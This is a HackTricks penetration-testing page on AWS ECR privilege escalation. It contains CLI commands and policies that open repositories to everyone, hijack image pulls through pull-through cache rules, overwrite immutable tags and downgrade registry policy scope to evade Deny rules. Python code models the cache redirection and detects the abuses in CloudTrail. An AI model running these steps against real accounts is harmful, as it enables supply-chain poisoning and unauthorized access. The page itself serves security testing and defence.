AWS - ECR Privesc
tip
Learn & practice AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking:
HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Azure Hacking:
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
ECR
ecr:GetAuthorizationToken,ecr:BatchGetImage
An attacker with ecr:GetAuthorizationToken and ecr:BatchGetImage can authenticate to ECR and pull images (a full docker pull also needs ecr:GetDownloadUrlForLayer to fetch the layer blobs, which is why the public pull policy below grants it as well).
For more information on how to pull images:
Potential Impact: Indirect privesc through sensitive information (credentials, configuration, source code) baked into the layers of the pulled images.
ecr:GetAuthorizationToken, ecr:BatchCheckLayerAvailability, ecr:CompleteLayerUpload, ecr:InitiateLayerUpload, ecr:PutImage, ecr:UploadLayerPart
An attacker with all these permissions can authenticate to ECR and push images. This can help escalate privileges into other environments where those images are run: whatever pulls the overwritten tag executes the attacker's code.
To learn how to push a new image or update an existing one, check:
ecr-public:GetAuthorizationToken, ecr-public:BatchCheckLayerAvailability, ecr-public:CompleteLayerUpload, ecr-public:InitiateLayerUpload, ecr-public:PutImage, ecr-public:UploadLayerPart
Same as the previous section, but for public repositories. Note that the ECR Public API is only served from us-east-1, so every aws ecr-public call must target that region.
ecr:SetRepositoryPolicy
An attacker with this permission can change the repository policy to grant themselves (or even everyone) read/write access.
For example, the following policy grants pull access to everyone:
aws ecr set-repository-policy \
--repository-name <repo_name> \
--policy-text file://my-policy.json
Contents of my-policy.json:
{
  "Version": "2008-10-17",
  "Statement": [
    {
      "Sid": "allow public pull",
      "Effect": "Allow",
      "Principal": "*",
      "Action": [
        "ecr:BatchCheckLayerAvailability",
        "ecr:BatchGetImage",
        "ecr:GetDownloadUrlForLayer"
      ]
    }
  ]
}
ecr-public:SetRepositoryPolicy
Same as the previous section, but for public repositories.
An attacker can modify the repository policy of an ECR Public repository to grant unauthorized public access or to add their own permissions. The example below goes further than the private one: besides pull it also grants push and DeleteRepositoryPolicy to everyone, so the attacker can keep the policy from being cleaned up. Remember that ecr-public commands must use --region us-east-1.
# Create a JSON file with the malicious public repository policy
echo '{
  "Version": "2008-10-17",
  "Statement": [
    {
      "Sid": "MaliciousPublicRepoPolicy",
      "Effect": "Allow",
      "Principal": "*",
      "Action": [
        "ecr-public:GetDownloadUrlForLayer",
        "ecr-public:BatchGetImage",
        "ecr-public:BatchCheckLayerAvailability",
        "ecr-public:PutImage",
        "ecr-public:InitiateLayerUpload",
        "ecr-public:UploadLayerPart",
        "ecr-public:CompleteLayerUpload",
        "ecr-public:DeleteRepositoryPolicy"
      ]
    }
  ]
}' > malicious_public_repo_policy.json
# Apply the malicious public repository policy to the ECR Public repository (ECR Public API lives in us-east-1)
aws ecr-public set-repository-policy --region us-east-1 --repository-name your-ecr-public-repo-name --policy-text file://malicious_public_repo_policy.json
Potential Impact: Unauthorized public access to the ECR Public repository, allowing any user to push, pull or delete images (and to remove the policy that granted it).
ecr:PutRegistryPolicy
An attacker with this permission can change the registry policy to grant themselves, their account (or even everyone) access at registry level. Keep in mind that the registry policy only governs every ECR action when REGISTRY_POLICY_SCOPE is V2; under V1 (see the ecr:PutAccountSetting section below) it only applies to CreateRepository, ReplicateImage and BatchImportUpstreamImage, i.e. replication and pull-through-cache imports into the registry, not ordinary pulls and pushes. The command is put-registry-policy (not set-repository-policy) and takes a registry-level policy document (Version 2012-10-17 with a Resource element):
aws ecr put-registry-policy \
--policy-text file://my-policy.json
ecr:CreatePullThroughCacheRule
Abuse ECR Pull Through Cache (PTC) rules to map an attacker-controlled upstream namespace to a trusted-looking prefix of the private ECR registry. Workloads that pull from the private ECR then transparently receive the attacker's images, without any push to the private ECR ever taking place.
- Required permissions: ecr:CreatePullThroughCacheRule, ecr:DescribePullThroughCacheRules, ecr:DeletePullThroughCacheRule. If ECR Public is used as the upstream: ecr-public:* to create/push to the public repo.
- Tested upstream: public.ecr.aws
Steps (example):
- Prepare the attacker image in ECR Public. Get your ECR Public alias with: aws ecr-public describe-registries --region us-east-1
aws ecr-public get-login-password --region us-east-1 | docker login --username AWS --password-stdin public.ecr.aws
docker build -t public.ecr.aws/<public_alias>/hacktricks-ptc-demo:ptc-test .
docker push public.ecr.aws/<public_alias>/hacktricks-ptc-demo:ptc-test
- Create the PTC rule in the private ECR to map a trusted prefix to the public registry
aws ecr create-pull-through-cache-rule --region us-east-2 --ecr-repository-prefix ptc --upstream-registry-url public.ecr.aws
- Pull the attacker image via the private ECR path (no push to the private ECR was done)
aws ecr get-login-password --region us-east-2 | docker login --username AWS --password-stdin <account_id>.dkr.ecr.us-east-2.amazonaws.com
docker pull <account_id>.dkr.ecr.us-east-2.amazonaws.com/ptc/<public_alias>/hacktricks-ptc-demo:ptc-test
docker run --rm <account_id>.dkr.ecr.us-east-2.amazonaws.com/ptc/<public_alias>/hacktricks-ptc-demo:ptc-test
Potential Impact: Supply-chain compromise by squatting internal image names under the chosen prefix. Any workload that pulls images from the private ECR using that prefix receives attacker-controlled content. The first pull also auto-creates the private repository ptc/<public_alias>/hacktricks-ptc-demo, so afterwards the cached copy looks like an ordinary internal image in the registry listing.
ecr:PutImageTagMutability
Abuse this permission to switch a repository from tag immutability to mutable and overwrite trusted tags (e.g. latest, stable, prod) with attacker-controlled content.
- Required permissions: ecr:PutImageTagMutability plus push capability (ecr:GetAuthorizationToken, ecr:InitiateLayerUpload, ecr:UploadLayerPart, ecr:CompleteLayerUpload, ecr:PutImage).
- Impact: Silent supply-chain compromise by replacing the content behind immutable tags without changing the tag names; consumers that pin by tag rather than by digest notice nothing.
Steps (example):
Compromise an immutable tag by flipping mutability
REGION=us-east-1
REPO=ht-immutable-demo-$RANDOM
aws ecr create-repository --region $REGION --repository-name $REPO --image-tag-mutability IMMUTABLE
acct=$(aws sts get-caller-identity --query Account --output text)
aws ecr get-login-password --region $REGION | docker login --username AWS --password-stdin ${acct}.dkr.ecr.${REGION}.amazonaws.com
# Build and push initial trusted tag
printf 'FROM alpine:3.19\nCMD echo V1\n' > Dockerfile && docker build -t ${acct}.dkr.ecr.${REGION}.amazonaws.com/${REPO}:prod . && docker push ${acct}.dkr.ecr.${REGION}.amazonaws.com/${REPO}:prod
# Attempt overwrite while IMMUTABLE (should fail)
printf 'FROM alpine:3.19\nCMD echo V2\n' > Dockerfile && docker build -t ${acct}.dkr.ecr.${REGION}.amazonaws.com/${REPO}:prod . && docker push ${acct}.dkr.ecr.${REGION}.amazonaws.com/${REPO}:prod
# Flip to MUTABLE and overwrite
aws ecr put-image-tag-mutability --region $REGION --repository-name $REPO --image-tag-mutability MUTABLE
docker push ${acct}.dkr.ecr.${REGION}.amazonaws.com/${REPO}:prod
# Validate consumers pulling by tag now get the poisoned image (prints V2)
docker run --rm ${acct}.dkr.ecr.${REGION}.amazonaws.com/${REPO}:prod
Global registry hijack via a ROOT Pull-Through Cache rule
Create a Pull-Through Cache (PTC) rule using the special ecrRepositoryPrefix=ROOT to map the root of the private ECR registry to an upstream public registry (e.g. ECR Public). Any pull of a repository that does not exist in the private registry is then transparently served from the upstream, enabling supply-chain hijacking without uploading anything to the private ECR.
- Required permissions: ecr:CreatePullThroughCacheRule, ecr:DescribePullThroughCacheRules, ecr:DeletePullThroughCacheRule, ecr:GetAuthorizationToken.
- Impact: Pulls of <account>.dkr.ecr.<region>.amazonaws.com/<any-existing-upstream-path>:<tag> succeed and auto-create private repos populated from the upstream.
Note: For ROOT rules, omit --upstream-repository-prefix. Providing a value triggers a validation error.
Demo (us-east-1, upstream public.ecr.aws)
REGION=us-east-1
ACCT=$(aws sts get-caller-identity --query Account --output text)
# 1) Create ROOT PTC rule mapping to ECR Public (no upstream prefix)
aws ecr create-pull-through-cache-rule \
--region "$REGION" \
--ecr-repository-prefix ROOT \
--upstream-registry-url public.ecr.aws
# 2) Authenticate to private ECR and pull via root path (triggers caching & auto repo creation)
aws ecr get-login-password --region "$REGION" | docker login --username AWS --password-stdin ${ACCT}.dkr.ecr.${REGION}.amazonaws.com
# Example using an official mirror path hosted in ECR Public
# (public.ecr.aws/docker/library/alpine:latest)
docker pull ${ACCT}.dkr.ecr.${REGION}.amazonaws.com/docker/library/alpine:latest
# 3) Verify repo and image now exist without any push
aws ecr describe-repositories --region "$REGION" \
--query "repositories[?repositoryName=='docker/library/alpine']"
aws ecr list-images --region "$REGION" --repository-name docker/library/alpine --filter tagStatus=TAGGED
# 4) Cleanup
aws ecr delete-pull-through-cache-rule --region "$REGION" --ecr-repository-prefix ROOT
aws ecr delete-repository --region "$REGION" --repository-name docker/library/alpine --force || true
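To reason about which images a PTC rule silently redirects, here is an added Python model (my example, not HackTricks' code and not the ECR service's implementation) of the path mapping used in the ecr:CreatePullThroughCacheRule and ROOT sections above: a private reference <account>.dkr.ecr.<region>.amazonaws.com/<prefix>/<path>:<tag> resolves to <upstream_registry_url>/<path>:<tag>, and a ROOT rule catches any repository that has no more specific rule. The precedence between overlapping rules (longest explicit prefix wins, ROOT is the fallback), the account id, the `evil-alias` ECR Public alias and the image names are assumptions/constructed inputs, not facts from the page.

```python
# Added example (not HackTricks' code, not the ECR implementation): models how
# pull-through cache rules rewrite private ECR references to upstream images.
from dataclasses import dataclass
from typing import List, Optional, Set, Tuple


@dataclass(frozen=True)
class PtcRule:
    ecr_repository_prefix: str                        # e.g. "ptc", or the special "ROOT"
    upstream_registry_url: str                        # e.g. "public.ecr.aws"
    upstream_repository_prefix: Optional[str] = None  # must be omitted for ROOT rules (page's note)


def split_reference(ref: str) -> Tuple[str, str, str]:
    """'<registry host>/<repo path>[:<tag>]' -> (host, repo path, tag); tag defaults to 'latest'."""
    host, _, rest = ref.partition("/")
    repo, sep, tag = rest.rpartition(":")
    if not sep:
        repo, tag = rest, "latest"
    return host, repo, tag


def resolve_upstream(rules: List[PtcRule], private_ref: str) -> Optional[Tuple[str, str]]:
    """Return (upstream image reference, private repo that gets auto-created), or None when
    no rule matches (the pull then only succeeds if the repo already exists in the registry)."""
    _, repo, tag = split_reference(private_ref)
    # Assumption of this model: the longest explicit prefix wins, ROOT is only the fallback.
    best: Optional[Tuple[str, PtcRule]] = None
    for rule in rules:
        if rule.ecr_repository_prefix == "ROOT":
            continue
        prefix = rule.ecr_repository_prefix.rstrip("/") + "/"
        if repo.startswith(prefix) and (best is None or len(prefix) > len(best[0])):
            best = (prefix, rule)
    if best is not None:
        prefix, rule = best
        upstream_path = repo[len(prefix):]
    else:
        root = next((r for r in rules if r.ecr_repository_prefix == "ROOT"), None)
        if root is None:
            return None
        rule, upstream_path = root, repo
    if rule.upstream_repository_prefix:
        upstream_path = f"{rule.upstream_repository_prefix}/{upstream_path}"
    return f"{rule.upstream_registry_url}/{upstream_path}:{tag}", repo


def hijacked_pulls(rules: List[PtcRule], private_refs: List[str],
                   attacker_namespaces: Set[Tuple[str, str]]) -> List[Tuple[str, str]]:
    """Private references whose upstream lives in an attacker-controlled (registry, namespace),
    e.g. the attacker's ECR Public alias: workloads pulling these run attacker content."""
    hits = []
    for ref in private_refs:
        resolved = resolve_upstream(rules, ref)
        if resolved is None:
            continue
        upstream, _ = resolved
        registry, _, path = upstream.partition("/")
        if (registry, path.split("/")[0]) in attacker_namespaces:
            hits.append((ref, upstream))
    return hits


# Constructed inputs: account id, region, alias and image names are made up.
ACCT = "123456789012"
PRIVATE = f"{ACCT}.dkr.ecr.us-east-2.amazonaws.com"
RULES = [PtcRule("ptc", "public.ecr.aws"), PtcRule("ROOT", "public.ecr.aws")]
WORKLOAD_IMAGES = [
    f"{PRIVATE}/ptc/evil-alias/hacktricks-ptc-demo:ptc-test",  # squatted under the trusted "ptc" prefix
    f"{PRIVATE}/docker/library/alpine:latest",                  # ROOT rule, official mirror path
    f"{PRIVATE}/evil-alias/internal-api:prod",                  # ROOT rule, attacker alias at registry root
]

if __name__ == "__main__":
    for ref, upstream in hijacked_pulls(RULES, WORKLOAD_IMAGES, {("public.ecr.aws", "evil-alias")}):
        print(f"HIJACKED {ref}\n      <- {upstream}")
```

Feed it the output of aws ecr describe-pull-through-cache-rules and the image references from your task definitions or pod specs to see which workloads would transparently switch to upstream content; anything resolving into a namespace you do not own is the page's supply-chain hijack in effect.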
ecr:PutAccountSetting (Downgrade REGISTRY_POLICY_SCOPE to bypass registry policy denies)
Abuse ecr:PutAccountSetting to change the registry policy scope from V2 (the policy applies to all ECR actions) to V1 (the policy applies only to CreateRepository, ReplicateImage and BatchImportUpstreamImage). If a strict registry policy Deny blocks actions such as CreatePullThroughCacheRule, downgrading to V1 removes that enforcement so that identity-policy Allows take over.
- Required permissions: ecr:PutAccountSetting, ecr:PutRegistryPolicy, ecr:GetRegistryPolicy, ecr:CreatePullThroughCacheRule, ecr:DescribePullThroughCacheRules, ecr:DeletePullThroughCacheRule. The registry policy permissions are only needed because the demo below sets up and restores the Deny itself; an attacker facing an existing Deny only needs ecr:PutAccountSetting plus the identity-policy Allow for the blocked action.
- Impact: Ability to perform ECR actions previously blocked by a registry policy Deny (e.g. creating PTC rules) by temporarily setting the scope to V1.
Steps (example):
Bypass a registry policy Deny on CreatePullThroughCacheRule by switching to `V1`
REGION=us-east-1
ACCT=$(aws sts get-caller-identity --query Account --output text)
# 0) Snapshot current scope/policy (for restore)
aws ecr get-account-setting --name REGISTRY_POLICY_SCOPE --region $REGION || true
aws ecr get-registry-policy --region $REGION > /tmp/orig-registry-policy.json 2>/dev/null || echo '{}' > /tmp/orig-registry-policy.json
# 1) Ensure V2 and set a registry policy Deny for CreatePullThroughCacheRule
aws ecr put-account-setting --name REGISTRY_POLICY_SCOPE --value V2 --region $REGION
cat > /tmp/deny-ptc.json <<'JSON'
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": "DenyPTCAll",
      "Effect": "Deny",
      "Principal": "*",
      "Action": ["ecr:CreatePullThroughCacheRule"],
      "Resource": "*"
    }
  ]
}
JSON
aws ecr put-registry-policy --policy-text file:///tmp/deny-ptc.json --region $REGION
# 2) Attempt to create a PTC rule (should FAIL under V2 due to Deny)
set +e
aws ecr create-pull-through-cache-rule \
--region $REGION \
--ecr-repository-prefix ptc-deny-test \
--upstream-registry-url public.ecr.aws
RC=$?
set -e
if [ "$RC" -eq 0 ]; then echo "UNEXPECTED: rule creation succeeded under V2 deny"; fi
# 3) Downgrade scope to V1 and retry (should SUCCEED now)
aws ecr put-account-setting --name REGISTRY_POLICY_SCOPE --value V1 --region $REGION
aws ecr create-pull-through-cache-rule \
--region $REGION \
--ecr-repository-prefix ptc-deny-test \
--upstream-registry-url public.ecr.aws
# 4) Verify rule exists
aws ecr describe-pull-through-cache-rules --region $REGION \
--query "pullThroughCacheRules[?ecrRepositoryPrefix=='ptc-deny-test']"
# 5) Cleanup and restore
aws ecr delete-pull-through-cache-rule --region $REGION --ecr-repository-prefix ptc-deny-test || true
if jq -e '.registryPolicyText' /tmp/orig-registry-policy.json >/dev/null 2>&1; then
jq -r '.registryPolicyText' /tmp/orig-registry-policy.json > /tmp/_orig.txt
aws ecr put-registry-policy --region $REGION --policy-text file:///tmp/_orig.txt
else
aws ecr delete-registry-policy --region $REGION || true
fi
aws ecr put-account-setting --name REGISTRY_POLICY_SCOPE --value V2 --region $REGION
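On the defensive side, every permission abused on this page leaves a management event in CloudTrail. The following added Python (my example, not part of HackTricks) triages a handful of constructed ecr.amazonaws.com / ecr-public.amazonaws.com records for exactly the abuses described above: repository or registry policies opened to Principal "*" (ecr:SetRepositoryPolicy, ecr-public:SetRepositoryPolicy, ecr:PutRegistryPolicy), pull-through cache rules with ROOT rated highest (ecr:CreatePullThroughCacheRule), tag immutability flipped to MUTABLE (ecr:PutImageTagMutability) and REGISTRY_POLICY_SCOPE set to V1 (ecr:PutAccountSetting). The requestParameters field names are assumed to mirror the API parameter names; the account id, ARNs, timestamps and repository names are constructed.

```python
# Added example (not HackTricks' code): triage CloudTrail records for the ECR
# privesc primitives on this page. Sample events are constructed, not real logs.
import json
from typing import Dict, List, Optional, Union

ECR_SOURCES = ("ecr.amazonaws.com", "ecr-public.amazonaws.com")


def policy_grants_everyone(policy: Union[str, dict, None]) -> bool:
    """True if an Allow statement uses Principal "*" or {"AWS": "*"} without any Condition."""
    if policy is None:
        return False
    if isinstance(policy, str):
        try:
            policy = json.loads(policy)
        except json.JSONDecodeError:
            return False
    statements = policy.get("Statement", [])
    if isinstance(statements, dict):
        statements = [statements]
    for stmt in statements:
        if stmt.get("Effect") != "Allow" or stmt.get("Condition"):
            continue
        principal = stmt.get("Principal")
        if principal == "*" or (isinstance(principal, dict) and principal.get("AWS") in ("*", ["*"])):
            return True
    return False


def triage_event(event: dict) -> Optional[Dict[str, str]]:
    """Map one CloudTrail record to a finding, or None if it is not one of the page's abuses."""
    if event.get("eventSource") not in ECR_SOURCES:
        return None
    name = event.get("eventName", "")
    params = event.get("requestParameters") or {}
    verdict = None
    if name in ("SetRepositoryPolicy", "PutRegistryPolicy") and policy_grants_everyone(params.get("policyText")):
        target = params.get("repositoryName", "<registry>")
        verdict = ("CRITICAL", f"{name}: {target} now allows Principal '*' with no Condition")
    elif name == "CreatePullThroughCacheRule":
        prefix = params.get("ecrRepositoryPrefix", "")
        severity = "CRITICAL" if prefix == "ROOT" else "HIGH"   # ROOT hijacks the whole registry namespace
        verdict = (severity, f"PTC rule '{prefix}' -> {params.get('upstreamRegistryUrl')}: upstream content served under the private registry")
    elif name == "PutImageTagMutability" and params.get("imageTagMutability") == "MUTABLE":
        verdict = ("HIGH", f"tag immutability disabled on {params.get('repositoryName')}: trusted tags can now be overwritten")
    elif name == "PutAccountSetting" and params.get("name") == "REGISTRY_POLICY_SCOPE" and params.get("value") == "V1":
        verdict = ("HIGH", "REGISTRY_POLICY_SCOPE downgraded to V1: registry policy Denies no longer cover most actions")
    if verdict is None:
        return None
    severity, detail = verdict
    return {
        "severity": severity,
        "eventName": name,
        "actor": (event.get("userIdentity") or {}).get("arn", "<unknown>"),
        "eventTime": event.get("eventTime", ""),
        "detail": detail,
    }


def triage(events: List[dict]) -> List[Dict[str, str]]:
    return [f for f in map(triage_event, events) if f is not None]


# Constructed sample records (account id, ARNs, times and names are made up).
def _rec(name, params, source="ecr.amazonaws.com",
         actor="arn:aws:iam::123456789012:user/ci-deployer", t="2024-05-01T10:00:00Z"):
    return {"eventTime": t, "eventSource": source, "eventName": name,
            "userIdentity": {"arn": actor}, "requestParameters": params}


PUBLIC_PULL = json.dumps({"Version": "2008-10-17", "Statement": [{"Sid": "allow public pull", "Effect": "Allow",
                          "Principal": "*", "Action": ["ecr:BatchGetImage", "ecr:GetDownloadUrlForLayer"]}]})
SCOPED_PULL = json.dumps({"Version": "2008-10-17", "Statement": [{"Effect": "Allow",
                          "Principal": {"AWS": "arn:aws:iam::210987654321:root"}, "Action": ["ecr:BatchGetImage"]}]})
OPEN_REGISTRY = json.dumps({"Version": "2012-10-17", "Statement": [{"Effect": "Allow", "Principal": "*",
                            "Action": ["ecr:CreateRepository", "ecr:ReplicateImage", "ecr:BatchImportUpstreamImage"],
                            "Resource": "arn:aws:ecr:us-east-1:123456789012:repository/*"}]})

SAMPLE_EVENTS = [
    _rec("BatchGetImage", {"repositoryName": "app"}),                                    # benign pull
    _rec("SetRepositoryPolicy", {"repositoryName": "app", "policyText": SCOPED_PULL}),  # cross-account, not public
    _rec("SetRepositoryPolicy", {"repositoryName": "app", "policyText": PUBLIC_PULL}),
    _rec("PutRegistryPolicy", {"policyText": OPEN_REGISTRY}),
    _rec("CreatePullThroughCacheRule", {"ecrRepositoryPrefix": "ROOT", "upstreamRegistryUrl": "public.ecr.aws"}),
    _rec("PutImageTagMutability", {"repositoryName": "app", "imageTagMutability": "MUTABLE"}),
    _rec("PutAccountSetting", {"name": "REGISTRY_POLICY_SCOPE", "value": "V1"}),
]

if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"[{f['severity']}] {f['eventTime']} {f['actor']} {f['detail']}")
```

The record list can be swapped for the Records array of a CloudTrail export or a CloudWatch Logs subscription; the policy check deliberately ignores statements that carry a Condition, so cross-account grants scoped by aws:PrincipalOrgID are not reported as public.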